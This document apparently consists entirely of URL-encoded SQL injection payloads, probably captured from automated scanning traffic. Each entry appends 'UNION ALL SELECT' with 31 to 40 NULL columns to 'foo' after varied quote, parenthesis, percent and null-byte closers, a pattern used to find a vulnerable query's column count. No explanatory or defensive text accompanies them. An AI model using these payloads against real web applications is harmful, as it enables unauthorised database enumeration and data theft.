foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%201076%3D1076%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%203640%3D3640%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 